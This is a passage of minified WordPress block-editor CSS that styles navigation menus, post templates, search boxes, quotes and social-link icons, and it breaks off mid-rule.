.has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{left:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:transparent;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;line-height:inherit;text-align:left;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-right:.85em}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-left:-.6em;pointer-events:none}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:auto;right:0}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:auto;right:100%}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid rgba(0,0,0,.15)}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-left:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards;background-color:inherit;display:flex;flex-direction:column;overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-left),20em);z-index:100000}@media (prefers-reduced-motion:reduce){.wp-block-navigation__responsive-container.is-menu-open{animation-delay:0s;animation-duration:1ms}}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:transparent!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:transparent;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{position:absolute;right:0;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-left:.1em}p.has-drop-cap.has-background{overflow:hidden}p.has-background{padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}.wp-block-post-author{display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-right:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form input[type=submit]{box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form input:not([type=submit]),.wp-block-post-comments-form textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments-form textarea{padding:calc(.667em + 2px)}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-post-date{box-sizing:border-box}:where(.wp-block-post-excerpt){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:transparent}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}.wp-block-post-time-to-read,.wp-block-post-title{box-sizing:border-box}.wp-block-post-title{word-break:break-word}.wp-block-post-title a{display:inline-block}.wp-block-preformatted{box-sizing:border-box;white-space:pre-wrap}:where(.wp-block-preformatted.has-background){padding:1.25em 2.375em}.wp-block-pullquote{box-sizing:border-box;overflow-wrap:break-word;padding:3em 0;text-align:center}.wp-block-pullquote blockquote,.wp-block-pullquote cite,.wp-block-pullquote p{color:inherit}.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{max-width:420px}.wp-block-pullquote cite,.wp-block-pullquote footer{position:relative}.wp-block-pullquote .has-text-color a{color:inherit}:where(.wp-block-pullquote){margin:0 0 1em}.wp-block-pullquote.has-text-align-left blockquote{text-align:left}.wp-block-pullquote.has-text-align-right blockquote{text-align:right}.wp-block-pullquote.is-style-solid-color{border:none}.wp-block-pullquote.is-style-solid-color blockquote{margin-left:auto;margin-right:auto;max-width:60%}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:2em;margin-bottom:0;margin-top:0}.wp-block-pullquote.is-style-solid-color blockquote cite{font-style:normal;text-transform:none}.wp-block-pullquote cite{color:inherit}.wp-block-post-template{list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.wp-block-post-template{background:none}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{-webkit-margin-start:2em;-webkit-margin-end:0;float:right;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{-webkit-margin-start:0;-webkit-margin-end:2em;float:left;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{-webkit-margin-start:auto;-webkit-margin-end:auto;margin-inline-end:auto;margin-inline-start:auto}.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{-webkit-margin-start:auto;margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{-webkit-margin-end:auto;margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination.aligncenter{justify-content:center}.wp-block-query-title,.wp-block-quote{box-sizing:border-box}.wp-block-quote{overflow-wrap:break-word}.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){margin-bottom:1em;padding:0 1em}.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{font-size:1.5em;font-style:italic;line-height:1.6}.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{font-size:1.125em;text-align:right}.wp-block-read-more{display:block;width:-moz-fit-content;width:fit-content}.wp-block-read-more:not([style*=text-decoration]),.wp-block-read-more:not([style*=text-decoration]):active,.wp-block-read-more:not([style*=text-decoration]):focus{text-decoration:none}ul.wp-block-rss{list-style:none;padding:0}ul.wp-block-rss.wp-block-rss{box-sizing:border-box}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;list-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{fill:currentColor;min-height:24px;min-width:24px;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max-width:calc(100% - 100px)}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search__button-behavior-expand .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden,.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}.wp-block[data-align=right] .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{float:right}.wp-block-separator{border:1px solid;border-left:none;border-right:none}.wp-block-separator.is-style-dots{background:none!important;border:none;height:auto;line-height:1;text-align:center}.wp-block-separator.is-style-dots:before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}.wp-block-site-logo.is-style-rounded{border-radius:9999px}.wp-block-site-title a{color:inherit}.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link a{padding:.25em}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block;height:auto;transition:transform .1s ease}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-delay:0s;transition-duration:0s}}.wp-block-social-link a{align-items:center;display:flex;line-height:0;transition:transform .1s ease}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:visited{fill:currentColor;color:currentColor}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link{background-color:#f0f0f0;color:#444}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-amazon{background-color:#f90;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-behance{background-color:#0757fe;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{background-color:#f45800;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{background-color:#1778f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-flickr{background-color:#0461dd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-foursquare{background-color:#e65678;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-github{background-color:#24292d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-google{background-color:#ea4434;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-instagram{background-color:#f00075;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-medium{background-color:#02ab6c;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-meetup{background-color:#f6405f;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-patreon{background-color:#ff424d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pinterest{background-color:#e60122;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pocket{background-color:#ef4155;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-reddit{background-color:#ff4500;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-skype{background-color:#0478d7;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-snapchat{stroke:#000;background-color:#fefc00;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-spotify{background-color:#1bd760;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-telegram{background-color:#2aabee;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-threads,.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tiktok{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tumblr{background-color:#011835;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitch{background-color:#6440a4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vk{background-color:#4680c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-x{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-yelp{background-color:#d32422;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-youtube{background-color:red;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link{background:none}.wp-block-social-links.is-style-logos-only .wp-social-link a{padding:0}.wp-block-social-links.is-style-logos-only .wp-social-link svg{height:1.25em;width:1.25em}.wp-block-social-links.is-style-logos-only .wp-social-link-amazon{color:#f90}.wp-block-social-links.is-style-logos-only .wp-social-link-bandcamp{color:#1ea0c3}.wp-block-social-links.is-style-logos-only .wp-social-link-behance{color:#0757fe}.wp-block-social-links.is-style-logos-only 